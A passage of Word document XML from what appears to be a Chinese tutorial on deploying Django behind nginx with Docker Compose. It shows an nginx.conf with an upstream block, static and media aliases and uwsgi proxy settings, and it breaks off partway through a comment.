      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>其中</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>nginx</w:t>
      </w:r>
      <w:r>
        <w:t>.conf</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1833278A" w14:textId="77777777" w:rsidR="00BE7374" w:rsidRDefault="00BE7374" w:rsidP="009222EB">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="282C34"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t># nginx</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>配置文件</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t># compose/nginx/nginx.conf</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>upstream django {</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t>ip_hash</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>server web:8000</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>; # Docker-compose web</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>服务端口</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>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r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t>server {</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    listen 80</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">; # </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>监听</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>80</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>端口</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">    server_name localhost</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">; # </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>可以是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>nginx</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>容器所在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>ip</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>地址或</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>127.0.0.1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>，不能写宿主机外网</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>ip</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>地址</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">    charset utf-8</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">    client_max_body_size 10M</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">; # </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>限制用户上传文件大小</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">    location /static {</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        alias /usr/share/nginx/html/static</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">; # </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>静态资源路径</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    location /media {</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        alias /usr/share/nginx/html/media</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">; # </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>媒体资源，用户上传文件路径</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    location ^~/api {</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        include /etc/nginx/uwsgi_params</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">        uwsgi_pass django</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">        uwsgi_read_timeout 600</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">        uwsgi_connect_timeout 600</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">        uwsgi_send_timeout 600</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">        proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">        proxy_set_header Host $http_host</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">        proxy_redirect off</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">        proxy_set_header X-Real-IP  $remote_addr</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        # proxy_pass http://django; # </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>uwsgi</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>通信，而不是</w:t>
      </w:r>
      <w:r>
